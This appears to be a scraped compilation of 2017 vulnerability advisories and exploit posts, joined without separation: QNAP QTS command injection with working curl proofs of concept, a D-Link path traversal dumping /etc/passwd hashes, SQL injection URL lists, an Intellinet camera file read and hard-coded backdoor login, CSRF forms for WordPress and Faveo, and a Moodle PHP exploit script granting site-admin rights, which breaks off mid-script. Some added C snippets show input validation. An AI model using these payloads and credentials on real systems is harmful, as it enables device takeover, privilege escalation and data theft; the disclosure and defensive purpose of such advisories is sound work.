QNAP QTS multiple RCE vulnerabilities
=====================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
Overview
--------
QNAP QTS firmware contains multiple Command Injection (CWE-77)
vulnerabilities that can be exploited to gain remote command execution
on the devices.
Description
-----------
QNAP QTS web user interface CGI binaries include Command Injection
(CWE-77) vulnerabilities. An unauthenticated attacker can execute
arbitrary commands on the targeted device.
Impact
------
The attacker is able to execute arbitrary commands as the administrative user
(root). The attacker therefore has full access to all content on the targeted
device, and can read, modify or remove content at will.
Details
-------
The discovered vulnerabilities, described in more detail below, enable
multiple independent attacks described here in brief:
- Unauthenticated Remote Command Execution
The unauthenticated attacker can perform HTTP requests that exploit
the vulnerability to execute arbitrary commands. If the device is
connected to the internet, the vulnerable devices can be taken over in
an automated fashion and can then be used for further attacks.
- Authenticated Remote Command Execution
The authenticated attacker can perform HTTP requests that exploit
the vulnerabilities to execute arbitrary commands. This gives users
that normally have only restricted access to the device full
administrative (root) access to the system and access to all data
stored on the device regardless of the specified access limitations.
Vulnerabilities
---------------
1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
/cgi-bin/authLogin.cgi CGI has a command injection bug. The
following commands are executed via system():
/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
The value inserted into %s is obtained from the `reboot_notice_msg' HTTP
request GET parameter.
The reboot_notice_msg is a base64 encoded message of the form:
QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
- TTTTTTTT is the unix time stamp (last 8 digits)
- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
- LLLL is the payload length
- PAYLOAD is the payload contents (LLLL bytes)
By creating a crafted reboot_notice_msg value, arbitrary commands
can be executed. For example:
QNAPVJBD88150863 Disconnect 14`(echo;id)>&2`
$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Content-type: text/xml
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<command>Disconnect</command>
<payload>`(echo;id)>&2`</payload>
</QDocRoot>
$
2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
command is executed via popen():
/sbin/cloud_util -r %s 2>/dev/null
The value inserted into %s is obtained from the `hash' HTTP request GET
parameter.
An authenticated user can use a specially crafted hash parameter to execute
arbitrary commands as root:
$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
HTTP/1.1 200 OK
Date: Sun, 26 Feb 2017 22:55:48 GMT
Transfer-Encoding: chunked
Content-Type: text/plain
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
Content-type: text/html; charset="UTF-8"
Usage:
/sbin/cloud_util -r [enc_token]
$
3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
following commands are executed via system():
/bin/kill -9 %s
The value inserted into %s is obtained from the `pid' HTTP request GET
parameter.
An authenticated user can use a specially crafted pid parameter to execute
arbitrary commands as root:
$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
[~] # cat /tmp/pwned
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
[~] #
Vulnerable devices
------------------
The vulnerabilities were discovered on a QNAP TVS-663, firmware version
4.2.2 Build 20161214. They are also confirmed to work with version 4.2.3
Build 20170213.
CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
20161028.
It is believed that these vulnerabilities affect all devices running QTS.
Recommendations to vendor
-------------------------
1. Fix the command injection vulnerabilities by performing proper input
validation (whitelisting) and/or shell metacharacter escaping, or by
utilizing the execl family of functions.
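One way to apply this recommendation to the reboot_notice_msg format described under vulnerability 1, as an added example that is not QNAP's code: it decodes the fixed-width layout given above, accepts only the command name the advisory mentions (an assumption; the real command list is not on the page) and a payload free of shell metacharacters, and then invokes /sbin/vjbod_util through fork/execv so the payload is never handed to a shell.

```c
#include <ctype.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed-width layout of the decoded reboot_notice_msg, as described above:
 *   "QNAPVJBD" | TTTTTTTT (8 digits) | CCCCCCCCCCCCCCCC (16 chars, space padded)
 *   | LLLL (4 digits) | PAYLOAD (LLLL bytes) */
enum { MAGIC_LEN = 8, TS_LEN = 8, CMD_LEN = 16, LEN_LEN = 4,
       HDR_LEN = MAGIC_LEN + TS_LEN + CMD_LEN + LEN_LEN, MAX_PAYLOAD = 128 };

struct vjbd_msg {
    char command[CMD_LEN + 1];
    char payload[MAX_PAYLOAD + 1];
};

/* Assumption: "Disconnect" is the only command the advisory names, so it is the
 * only one accepted here; a real decoder would list every legitimate command. */
static const char *const allowed_commands[] = { "Disconnect", NULL };

static int all_digits(const char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char) p[i])) return 0;
    return 1;
}

/* Allow-list for payload bytes: backtick, $, ;, |, &, >, quotes and every other
 * shell metacharacter are rejected before the payload gets near a command line. */
static int payload_char_ok(unsigned char c)
{
    return isalnum(c) || c == '-' || c == '_' || c == '.' || c == ':';
}

/* Decode and validate one message. Returns 1 and fills *out on success,
 * 0 if any field is malformed or carries a disallowed character. */
int vjbd_parse(const char *msg, size_t len, struct vjbd_msg *out)
{
    if (len < HDR_LEN || memcmp(msg, "QNAPVJBD", MAGIC_LEN) != 0) return 0;
    const char *ts = msg + MAGIC_LEN, *cmd = ts + TS_LEN;
    const char *lf = cmd + CMD_LEN, *pl = lf + LEN_LEN;
    if (!all_digits(ts, TS_LEN) || !all_digits(lf, LEN_LEN)) return 0;

    /* Command field: strip space padding, then require an exact allow-listed name. */
    size_t start = 0, end = CMD_LEN;
    while (start < end && cmd[start] == ' ') start++;
    while (end > start && cmd[end - 1] == ' ') end--;
    if (end == start) return 0;
    memcpy(out->command, cmd + start, end - start);
    out->command[end - start] = '\0';
    int known = 0;
    for (const char *const *a = allowed_commands; *a != NULL; a++)
        if (strcmp(*a, out->command) == 0) known = 1;
    if (!known) return 0;

    /* Length field must describe exactly the bytes that follow. */
    char lenbuf[LEN_LEN + 1];
    memcpy(lenbuf, lf, LEN_LEN);
    lenbuf[LEN_LEN] = '\0';
    size_t plen = (size_t) atoi(lenbuf);
    if (plen == 0 || plen > MAX_PAYLOAD || plen != len - HDR_LEN) return 0;
    for (size_t i = 0; i < plen; i++)
        if (!payload_char_ok((unsigned char) pl[i])) return 0;
    memcpy(out->payload, pl, plen);
    out->payload[plen] = '\0';
    return 1;
}

/* Replacement for system("/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1"): fork + execv
 * hands the payload over as one argv entry, so no shell ever interprets it. Output
 * goes to /dev/null as in the original. Returns the child's exit status or -1. */
int run_argv_quiet(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull >= 0) { dup2(devnull, 1); dup2(devnull, 2); close(devnull); }
        execv(path, argv);
        _exit(127);                             /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What the CGI should do with the decoded parameter: reject anything that does not
 * parse, otherwise run the helper with the payload as a plain argument. */
int handle_reboot_notice(const char *decoded, size_t len)
{
    struct vjbd_msg m;
    if (!vjbd_parse(decoded, len, &m)) return 0;
    char *const argv[] = { "/sbin/vjbod_util", "-i", m.payload, NULL };
    run_argv_quiet(argv[0], argv);
    return 1;
}
```

The crafted message from the PoC above is rejected at the payload allow-list before any command is built; a well-formed message reaches the helper with its payload as a single argument.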
End user mitigation
-------------------
- Install the firmware update version 4.2.4 build 20170313 or later.
OR
- Restrict access to the web user interface (ports 8080 and 443).
Credits
-------
The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
Timeline
--------
21.01.2017 discovered vulnerabilities 2 and 3
23.02.2017 discovered vulnerability 1
23.02.2017 reported vulnerability 1 to the vendor
26.02.2017 started to write a preliminary advisory
27.02.2017 sent the preliminary advisory to vendor and CERT-FI
27.02.2017 requested CVE-IDs from MITRE
28.02.2017 received CVE-IDs from MITRE
02.03.2017 inquired status from vendor contact
02.03.2017 vendor confirmed CVE-2017-6361
04.03.2017 vendor confirmed the other two vulnerabilities
13.03.2017 vendor communicated about an upcoming release fixing the vulns
14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns
15.03.2017 sent update to CERT-FI
21.03.2017 vendor released NAS-201703-21 advisory:
https://www.qnap.com/en/support/con_show.php?cid=113
06.04.2017 public release of the advisory
<!--
Details
================
Software: WordPress Firewall 2
Version: 1.3
Homepage: https://wordpress.org/plugins/wordpress-firewall-2/
Advisory report: https://security.dxw.com/advisories/csrfstored-xss-in-wordpress-firewall-2-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Description
================
CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can
Vulnerability
================
HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.
Proof of concept
================
Visit the following page, click on the submit button, then visit the plugin’s options page:
-->
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
<input type="text" name="email_address" value=""><script>alert(1)</script>">
<input type="text" name="set_email" value="Set Email">
<input type=\"submit\">
</form>
<!--
In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
Timeline
================
2016-12-23: Discovered
2017-03-16: Reported to vendor by email
2017-04-04: Vendor could not be contacted
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from a vulnerability
that allows unauthorized file download from the device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)
# # # # #
# Exploit Title: My Gaming Ladder System 6.0 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/ladder.shtml
# Demo: http://www.ladder.tf2.co.za/
# Version: 6.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/news.php?faqid=[SQL]
# staff :id
# staff :displayname
# staff :pass
# staff :email
# staff :title
# staff :access
# staff :contact
# # # # #
# # # # #
# Exploit Title: My Gaming Ladder Combo System 7.5 - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: http://www.mygamingladder.com/
# Software: http://www.mygamingladder.com/demos.shtml
# Demo: http://www.mygamingladder.com/upgrade/combo/
# Version: 7.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/game.php?gameid=[SQL]
# http://localhost/[PATH]/news.php?newsid=[SQL]
# http://localhost/[PATH]/teams.php?teamid=[SQL]
# http://localhost/[PATH]/match.php?matchid=[SQL]
# staff
# staffaccess
# staffcomments
# teammembers
# teammembersinv
# teams
# # # # #
# # # # #
# Exploit Title: Survey Template v1.1 for ASPRunnerPro,PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=3
# Demo: https://xlinesoft.com/livedemo/survey/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/svv_questions_list.php?mastertable=svv_surveys&masterkey1=[SQL]
# # # # #
# # # # #
# Exploit Title: Quiz Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=2
# Demo: https://xlinesoft.com/livedemo/quiz/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/quiz_responses_add.php?testid=[SQL]
# # # # #
# # # # #
# Exploit Title: Forum Template v1.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/marketplace/products_view.php?editid1=9
# Demo: https://xlinesoft.com/livedemo/forum/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/replies/list?mastertable=topics&masterkey1=[SQL]
# http://localhost/[PATH]/topics/list?search=[SQL]
# # # # #
# # # # #
# Exploit Title: Calendar v2.0 for ASPRunnerPro/PHPRunner/ASPRunner.NET. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/templates/calendar/index.htm
# Demo: https://xlinesoft.com/livedemo/calendar/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/caldaily_view.php?editid1=[SQL]
# # # # #
# # # # #
# Exploit Title: Shopping Cart Template v1.0 for ASPRunnerPro/PHPRunner. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/templates/shoppingcart/index.htm
# Demo: https://xlinesoft.com/livedemo/shopcart/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/client/shopinventory_list.php?item=[SQL]
# # # # #
# # # # #
# Exploit Title: Document Management Template v1.0 for PHPRunner 8.x,ASPRunnerPro 9.x,ASPRunner.NET 8.x or better.- SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/docmanager
# Demo: https://xlinesoft.com/livedemo/docmanager/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/Share_add.php?hash=[SQL]
# # # # #
# # # # #
# Exploit Title: Invoice Template v1.0 for PHPRunner/ASPRunnerPro/ASPRunner.NET. - SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/invoice
# Demo: https://xlinesoft.com/livedemo/invoice/livedemo1/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/invoices_view.php?hash=[SQL]
# # # # #
Bitcrack Cyber Security - BitLabs Advisory
http://www.bitcrack.net
Multiple Vulnerabilities in Intellinet NFC-30IR Network Cameras
ADVISORY
--------
Title: Local File Inclusion in CGI-SCRIPT & Hard-Coded Manufacturer Backdoor
Advisory ID: BITL-17-001
Date published: 2017-04-05
Date of last update: 2017-04-05
Vendors contacted: Intellinet
VULNERABILITY
-------------
Type: Local File Inclusion (LFI)(Authenticated) & Hardcoded Manufacturer Backdoor
Risk/Impact: Access to sensitive files & Access control bypass.
Exploitation Type : Remote
CVE Name: CVE-2017-7461 and CVE-2017-7462
DESCRIPTION
------------
We found two vulnerabilities affecting the Intellinet NFC-30IR Camera with
firmware version LM.1.6.16.05.
1. [CVE-2017-7461] once authenticated as admin:admin, you can read local files
by requesting the '/cgi-bin/admin/fileread?READ.filePath=<insert here>'
Instead of rendering information with server-side scripts, the firmware stores it in
plain text files and uses the /fileread CGI script to return them verbatim; the site
then relies on JavaScript to format the text into something presentable.
The script neither sanitizes nor restricts the paths it will read, so any file on the
device can be viewed. Files of interest include /etc/passwd, /etc/boa.conf and more.
2. [CVE-2017-7462] a manufacturer backdoor exists that allows one to access a script
called '/cgi-bin/mft/manufacture' by authenticating as manufacture:erutcafunam
This binary has been analyzed before by other vendors. We did not analyze it again as we
feel this is the same file used in other cameras. Note that the NFC-30IR does NOT have the
wireless_mft executable.
The hard-coded manufacturer user:pass is manufacture:erutcafunam, as shown in the
boa.conf snippet below:
/----
--snip--
#ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
ScriptAlias /cgi-bin/operator/ /opt/cgi/operator/
ScriptAlias /cgi-bin/view/ /opt/cgi/view/
ScriptAlias /cgi-bin/admin/ /opt/cgi/admin/
ScriptAlias /cgi-bin/jpg/ /opt/cgi/jpg/
ScriptAlias /cgi-bin/ /opt/cgi/
ScriptAlias /jpg /opt/cgi/jpg
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
--snip--
----/
This indicates that the camera hardware may be some kind of modified/stripped version
of a Zavio board.
VENDOR RESPONSE/NOTIFICATION
----------------------------
Vendor was given 7 days to respond, and 3 written notifications.
No response received nor acknowledgement.
Vendor has not released updates to fix the vulnerabilities.
CREDITS
-------
Vulnerabilities discovered by Dimitri Fousekis/RuraPenthe
Additional information on how the manufacture CGI executable works was obtained by
information written by Core Security/Francisco Falcon.
PROOF OF CONCEPT CODE
----------------------
LOCAL FILE INCLUSION THROUGH CGI FILE READER
/-----
GET /cgi-bin/admin/fileread?READ.filePath=/etc/passwd HTTP/1.1
Host: 10.0.0.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http://10.0.0.21/system_info.htm
Cookie: VideoFmt=3
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
-----/
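For the two unrestricted file-read issues on this page, the D-Link DWR-116 traversal (/uir/../../etc/passwd) and the Intellinet fileread script that opens whatever READ.filePath names, this is the containment check a CGI should make before opening a file. It is an added example, not either vendor's code, and assumes the caller supplies the directory the script is allowed to serve from.

```c
#include <string.h>

#define MAX_SEGMENTS 64

/* Lexically normalise `req` (already URL-decoded; an embedded NUL must have been
 * rejected by the decoder) and join it under `root`, which has no trailing slash.
 * Returns 1 and writes the joined path to `out` when it stays inside root, and 0
 * when the request is empty, climbs above root with "..", or does not fit.
 * Symlinks are not considered; when they can exist under root the server should
 * also realpath() the result and re-check the prefix. */
int resolve_under_root(const char *root, const char *req, char *out, size_t outlen)
{
    const char *seg[MAX_SEGMENTS];
    size_t seglen[MAX_SEGMENTS];
    size_t depth = 0;

    for (const char *p = req; *p != '\0'; ) {
        while (*p == '/') p++;                         /* collapse "//" and skip "/" */
        if (*p == '\0') break;
        const char *start = p;
        while (*p != '\0' && *p != '/') p++;
        size_t n = (size_t) (p - start);
        if (n == 1 && start[0] == '.') continue;       /* "." changes nothing */
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return 0;                  /* ".." above root: reject */
            depth--;
            continue;
        }
        if (depth == MAX_SEGMENTS) return 0;
        seg[depth] = start;
        seglen[depth] = n;
        depth++;
    }
    if (depth == 0) return 0;                          /* nothing to serve */

    size_t used = strlen(root);
    if (used >= outlen) return 0;
    memcpy(out, root, used);
    for (size_t i = 0; i < depth; i++) {
        if (used + 1 + seglen[i] >= outlen) return 0;
        out[used++] = '/';
        memcpy(out + used, seg[i], seglen[i]);
        used += seglen[i];
    }
    out[used] = '\0';
    return 1;
}
```

An absolute request such as /etc/passwd is re-rooted under the served directory rather than opened as given, and the D-Link PoC path is rejected at its second "..".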
ABOUT BITLABS
-------------
BitLabs is the research division of Bitcrack Cyber Security, a South African & Mauritian
based cyber security company. We specialize in providing our clients with research and
information to combat current and future attacks on their systems and devices.
BitLabs focuses primarily on IoT device research, identifying vulnerabilities and other
attack vectors that can impact users of these devices negatively.
Our Web address is at : http://www.bitcrack.net
DISCLAIMER INFO
---------------
All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security,
and are licensed under a Creative Commons Attribution Non-Commercial 3.0
(South Africa) License: http://za.creativecommons.org/ and other countries as and when
stipulated.
# Exploit Title: CSRF / Privilege Escalation (Manipulation of Role Agent to Admin) on Faveo version Community 1.9.3
# Google Dork: no
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.faveohelpdesk.com/
# Software Link: https://codeload.github.com/ladybirdweb/faveo-helpdesk/zip/v1.9.3
# Version: Community 1.9.3
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L (8.3 - HIGH)
# CVE: 2017-7571
I. Background:
Faveo Helpdesk is an open source ticketing system built on the Laravel framework. The name Faveo is derived from Latin and means "to be favourable", which reflects the vision, scope and functionality of the product. It is designed to cater to the needs of startups and SMEs, providing them with a state-of-the-art ticket-based support system. In today's competitive startup scenario customer retention is one of the major challenges; handling client queries diligently makes all the difference between retaining and losing a long-lasting relationship.
II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Faveo has the following roles:
- user (cannot access the backend)
- agent (can access the backend, with limited rights)
- admin (full access to the backend)
III. Exploit:
CSRF target is: “/public/rolechangeadmin/USER_ID”
e.g.:
user id = 11 (role is agent)
We have low-privilege access to the application as an “agent” and want to change our role to admin.
- Create a sample CSRF page (rolechange.html):
<!-- CSRF PoC -->
<html>
<body>
<form action="http://example.com/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
<input type="hidden" name="group" value="1" />
<input type="hidden" name="primary_department" value="3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Before running “rolechange.html”, log in with your agent account, then open the HTML file and submit the form.
- Yeaaah, now user id 11 has admin privileges ^_^
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security
Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
PoC:
https://github.com/ladybirdweb/faveo-helpdesk/issues/446
http://rungga.blogspot.co.id/2017/04/csrf-privilege-escalation-manipulation.html
# Exploit: Moodle SQL Injection via Object Injection Through User Preferences
# Date: April 6th, 2017
# Exploit Author: Marko Belzetski
# Contact: mbelzetski@protonmail.com
# Vendor Homepage: https://moodle.org/
# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions
# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04
# CVE : CVE-2017-2641
1. Description
In Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an object injection through a legacy user preferences setting (described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/).
2. PoC
Log in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.
<?php
//defining the required classes for our exploit
namespace gradereport_singleview\local\ui {
class feedback{
}
}
namespace {
class gradereport_overview_external{
}
class grade_item{
}
class grade_grade{
}
// creating a simple httpPost method which requires php-curl
function httpPost($url, $data, $MoodleSession, $json)
{
$curl = curl_init($url);
$headers = array('Cookie: MoodleSession='.$MoodleSession);
if($json){
array_push($headers, 'Content-Type: application/json');
}else{
$data = urldecode(http_build_query($data));
}
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
// creating a simple httpGet method which requires php-curl
function httpGet($url, $MoodleSession)
{
$curl = curl_init($url);
$headers = array('Cookie: MoodleSession='.$MoodleSession);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){
//first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need
$base = new gradereport_overview_external();
// now we create the feedback object which inherits the vulnerable __tostring() method from its parent
$fb = new gradereport_singleview\local\ui\feedback();
//filling the feedback object with the required properties for the exploit to work
$fb -> grade = new grade_grade();
$fb -> grade -> grade_item = new grade_item();
$fb -> grade -> grade_item -> calculation = "[[somestring";
$fb -> grade -> grade_item -> calculation_normalized = false;
//setting the table which we want to alter
$fb -> grade -> grade_item -> table = $table;
//setting the row id of the row that we want to alter
$fb -> grade -> grade_item -> id = $rowId;
//setting the column with the value that we want to insert
$fb -> grade -> grade_item -> $column = $value;
$fb -> grade -> grade_item -> required_fields = array($column,'id');
//creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object
$arr = array(array($base),$fb);
//serializing the array
$value = serialize($arr);
//we'll set the course_blocks sortorder to 0 so we default to legacy user preference
$data = array('sesskey' => $sesskey, 'sortorder[]' => 0);
httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
//injecting the payload
$data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));
httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);
//getting the frontpage so the payload will activate
httpGet($url.'/my/', $MoodleSession);
}
$url = ''; //url of the Moodle site
$MoodleSession = ''; //your MoodleSession cookie value
$sesskey = ''; //your sesskey
$table = "config"; //table to update
$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation
